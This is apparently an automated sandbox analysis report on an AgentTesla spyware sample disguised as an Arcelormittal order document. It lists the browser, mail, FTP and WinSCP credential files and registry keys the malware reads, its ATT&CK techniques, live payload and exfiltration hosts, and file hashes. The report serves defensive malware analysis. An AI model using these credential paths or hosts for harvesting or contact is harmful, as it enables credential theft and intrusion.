Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_00406054 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

1_2_00406054

Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	117 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	241 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	22 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	111 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Time Based Evasion	DCSync	1 Time Based Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	73%	ReversingLabs	Win32.Trojan.Leonem
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	62%	Virustotal		Browse
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	33%	Metadefender		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll	8%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll	0%	Metadefender	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
smtp.jubana.cam	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://3k8kPNo7ce8FL.comt-	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://103.156.93.29/GpqoIwsbfqqIcl84.xtp	100%	Avira URL Cloud	malware
http://lgHVjR.com	0%	Avira URL Cloud	safe
http://lgHVjR.com	0%	Virustotal		Browse
https://3k8kPNo7ce8FL.com	0%	Avira URL Cloud	safe
http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVs	100%	Avira URL Cloud	malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://smtp.jubana.cam	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.224	true	false		high
smtp.jubana.cam	unknown	unknown	false	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.156.93.29/GpqoIwsbfqqIcl84.xtp	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://3k8kPNo7ce8FL.comt-	CasPol.exe, 00000097.00000002.67445612440.000000001D618000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lgHVjR.com	CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	false		high
https://3k8kPNo7ce8FL.com	CasPol.exe, 00000097.00000002.67445839511.000000001D63E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVs	CasPol.exe, 00000097.00000002.67423180687.0000000001068000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://us2.smtp.mailhostbox.com	CasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://smtp.jubana.cam	CasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.156.93.29	unknown	unknown		134687	TWIDC-AS-APTWIDCLimitedHK	false
208.91.199.224	us2.smtp.mailhostbox.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	716470
Start date and time:	2022-10-05 09:33:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	155
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@215/6@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.5% (good quality ratio 30%) Quality average: 86.8% Quality standard deviation: 22%
HCA Information:	Successful, ratio: 97% Number of executed functions: 88 Number of non-executed functions: 123
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:36:28	API Interceptor	2453x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.156.93.29	SecuriteInfo.com.Win32.Evo-gen.31438.15186.exe	Get hash	malicious	Browse	103.156.93.29/GnBxTI30.lzh
	Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exe	Get hash	malicious	Browse	103.156.93.29/GuCtcOKrhSJTkMeQiL243.dsp
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	Browse	103.156.93.29/fENsCxXMHCKy237.ttf
	SecuriteInfo.com.Mal.Generic-S.9895.exe	Get hash	malicious	Browse	103.156.93.29/oaULM141.emz
	SecuriteInfo.com.Mal.Generic-S.31925.exe	Get hash	malicious	Browse	103.156.93.29/GNywZWtHMMV73.csv
	Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exe	Get hash	malicious	Browse	103.156.93.29/rSUTNfNHLJYAQC23.jpb
	KARL MAYER Offer PAGET C+A 09.07.exe	Get hash	malicious	Browse	103.156.93.29/XAWVWUiqKVoHTiESkFngHIal212.pcz
	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.30458.11641.exe	Get hash	malicious	Browse	103.156.93.29/TWoBhJLzHnQUJJkfkW215.smi
	SecuriteInfo.com.NSIS.Injector.AOW.tr.1209.exe	Get hash	malicious	Browse	103.156.93.29/tdfpJSSWujPG41.dwp
	SecuriteInfo.com.Win32.Evo-gen.2134.exe	Get hash	malicious	Browse	103.156.93.29/KeoEi165.inf
	PO-GZ347-8432.exe	Get hash	malicious	Browse	103.156.93.29/jghvQudQtK230.pfb
	Offer PAGET C+A 09.07.exe	Get hash	malicious	Browse	103.156.93.29/nImchRzmZgnjKMDgAIYMwLy71.pcx
	RFQ-NEWL-2000_pdf.exe	Get hash	malicious	Browse	103.156.93.29/wUBmljX57.toc
	PO AW109E.exe	Get hash	malicious	Browse	103.156.93.29/UJlqDmiXEMmlCKYs204.lpk
	Document No.UESSCM002 rev 1.exe	Get hash	malicious	Browse	103.156.93.29/VQSDvDbfZHJS227.fla
	Adriatic Capital Tender Document 2022 09 15_pdf.exe	Get hash	malicious	Browse	103.156.93.29/vIWFOFpd92.emz
	SecuriteInfo.com.HEUR.Trojan.Win32.GuLoader.gen.23286.exe	Get hash	malicious	Browse	103.156.93.29/XdZyOtUFicHrnkjWc131.qxd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	SOA.EXE.exe	Get hash	malicious	Browse	208.91.198.143
	Aviso_de_Pagamento_.exe	Get hash	malicious	Browse	208.91.199.225
	910635.exe	Get hash	malicious	Browse	208.91.199.225
	soa.exe	Get hash	malicious	Browse	208.91.198.143
	Aviso_de_Pagamento_.exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.Win32.PWSX-gen.16745.exe	Get hash	malicious	Browse	208.91.199.225
	DHL Shipment Doc6532291931_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	AvEQnWGwPb43iCj.exe	Get hash	malicious	Browse	208.91.199.225
	October_Order.exe	Get hash	malicious	Browse	208.91.199.223
	HRGRILL-KP2401 Pellet grill 2394-2492-4-yi8oo99.exe	Get hash	malicious	Browse	208.91.199.224
	Curriculum Vitae..exe	Get hash	malicious	Browse	208.91.199.224
	Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exe	Get hash	malicious	Browse	208.91.198.143
	DOC_SKTSRI133_EV-PROF-2022-09-29_972484929923646208xE583sMS2tcO3o.exe	Get hash	malicious	Browse	208.91.198.143
	Curriculum Vitae..exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Mal.Generic-S.9895.exe	Get hash	malicious	Browse	208.91.199.224
	AWB DOCS.exe	Get hash	malicious	Browse	208.91.199.224
	Curriculum Vitae..exe	Get hash	malicious	Browse	208.91.199.224
	EGYPT ORDER.EXE.exe	Get hash	malicious	Browse	208.91.199.223
	Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exe	Get hash	malicious	Browse	208.91.198.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TWIDC-AS-APTWIDCLimitedHK	SecuriteInfo.com.Win32.Evo-gen.31438.15186.exe	Get hash	malicious	Browse	103.156.93.29
	Voicemail Audio Transcription.htm	Get hash	malicious	Browse	103.153.182.55
	Qp7zXlMjyW.elf	Get hash	malicious	Browse	154.211.10.114
	Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exe	Get hash	malicious	Browse	103.156.93.29
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	Browse	103.156.93.29
	SecuriteInfo.com.Mal.Generic-S.9895.exe	Get hash	malicious	Browse	103.156.93.29
	SecuriteInfo.com.Mal.Generic-S.31925.exe	Get hash	malicious	Browse	103.156.93.29
	grW2oNaXqR.elf	Get hash	malicious	Browse	103.158.48.217
	v22-003920.exe	Get hash	malicious	Browse	103.158.191.79
	Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exe	Get hash	malicious	Browse	103.156.93.29
	KARL MAYER Offer PAGET C+A 09.07.exe	Get hash	malicious	Browse	103.156.93.29
	https://stpete.mobirisesite.com/	Get hash	malicious	Browse	103.153.183.146
	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.30458.11641.exe	Get hash	malicious	Browse	103.156.93.29
	SecuriteInfo.com.NSIS.Injector.AOW.tr.1209.exe	Get hash	malicious	Browse	103.156.93.29
	6Jjvn7F37w.elf	Get hash	malicious	Browse	103.157.218.84
	SecuriteInfo.com.Win32.Evo-gen.2134.exe	Get hash	malicious	Browse	103.156.93.29
	PO-GZ347-8432.exe	Get hash	malicious	Browse	103.156.93.29
	EW2VNaHDDi.elf	Get hash	malicious	Browse	103.158.234.236
	Offer PAGET C+A 09.07.exe	Get hash	malicious	Browse	103.156.93.29
	RFQ-NEWL-2000_pdf.exe	Get hash	malicious	Browse	103.156.93.29
PUBLIC-DOMAIN-REGISTRYUS	SOA.EXE.exe	Get hash	malicious	Browse	208.91.198.143
	Aviso_de_Pagamento_.exe	Get hash	malicious	Browse	208.91.199.225
	910635.exe	Get hash	malicious	Browse	208.91.199.225
	swift advice (3).exe	Get hash	malicious	Browse	111.118.215.51
	soa.exe	Get hash	malicious	Browse	208.91.198.143
	swift advice (2).exe	Get hash	malicious	Browse	111.118.215.51
	revised original documents.exe	Get hash	malicious	Browse	162.215.240.200
	INQUIRY.exe	Get hash	malicious	Browse	162.215.240.200
	________.exe	Get hash	malicious	Browse	208.91.198.170
	Aviso_de_Pagamento_.exe	Get hash	malicious	Browse	208.91.199.224
	revised original documents.exe	Get hash	malicious	Browse	162.215.240.200
	revised original documents.exe	Get hash	malicious	Browse	162.215.240.200
	TAX INVOICE.exe	Get hash	malicious	Browse	162.215.240.200
	payment copy (2).exe	Get hash	malicious	Browse	111.118.215.51
	AvEQnWGwPb43iCj.exe	Get hash	malicious	Browse	208.91.199.225
	http://njcqpc.avknt.khoormann.deenampro.com./#.aHR0cHM6Ly91c2VyLmxvZ290ZWMucGUvdGFzay9hMmh2YjNKdFlXNXVRSFZ1WTI5dGJpNWpiMjA9	Get hash	malicious	Browse	199.79.63.24
	TAX INVOICE.exe	Get hash	malicious	Browse	162.215.240.200
	October_Order.exe	Get hash	malicious	Browse	208.91.199.223
	HRGRILL-KP2401 Pellet grill 2394-2492-4-yi8oo99.exe	Get hash	malicious	Browse	208.91.199.224
	payment copy.exe	Get hash	malicious	Browse	111.118.215.51

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	Browse
	new order.xlsx	Get hash	malicious	Browse
	PI_372572000079567W.exe	Get hash	malicious	Browse
	PI_372572000079567W.exe	Get hash	malicious	Browse
	RFQ73645937392344.exe	Get hash	malicious	Browse
	RFQ73645937392344.exe	Get hash	malicious	Browse
	OmslagstegningGermany.exe	Get hash	malicious	Browse
	OmslagstegningGermany.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.Generic-S.9895.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.Generic-S.31925.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.Generic-S.9895.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.Generic-S.31925.exe	Get hash	malicious	Browse
	INVO-0987654345678.exe	Get hash	malicious	Browse
	INVO-0987654345678.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.655335921632966
Encrypted:	false
SSDEEP:	192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
MD5:	EE260C45E97B62A5E42F17460D406068
SHA1:	DF35F6300A03C4D3D3BD69752574426296B78695
SHA-256:	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
SHA-512:	A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 8%, Browse
Joe Sandbox View:	Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: new order.xlsx, Detection: malicious, Browse Filename: PI_372572000079567W.exe, Detection: malicious, Browse Filename: PI_372572000079567W.exe, Detection: malicious, Browse Filename: RFQ73645937392344.exe, Detection: malicious, Browse Filename: RFQ73645937392344.exe, Detection: malicious, Browse Filename: OmslagstegningGermany.exe, Detection: malicious, Browse Filename: OmslagstegningGermany.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse Filename: INVO-0987654345678.exe, Detection: malicious, Browse Filename: INVO-0987654345678.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.139253382998066
Encrypted:	false
SSDEEP:	96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
MD5:	1B0E41F60564CCCCCD71347D01A7C397
SHA1:	B1BDDD97765E9C249BA239E9C95AB32368098E02
SHA-256:	13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
SHA-512:	B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Dybdemaaler100\Reservationsseddelen\Sandwichmnd\network-workgroup-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	824
Entropy (8bit):	5.20249576082362
Encrypted:	false
SSDEEP:	24:t4CBGDT/MA6x+mXkvG3ll4AeW0WNDNHkdMRAeW0fcj:gDT/owRvGn4AewpOiAe5cj
MD5:	4F05487595F8C324710ACC9E0359A72F
SHA1:	20FFAD557E25CA662F3EF4FCC0A0479F483B209E
SHA-256:	9BFFBE1954818E8A73B0A11734BC1D684118DF513766EDDD5C424E8FEBE74FAA
SHA-512:	128526C5A71F1E885E4F18157AEE73F7EEE98FBA15C32A28F42D9FCFAD953972409264F82F6A3A14A1AA1FAC829F39DB9CEAD2FEE06C0258F26DCBE2142BC751
Malicious:	false
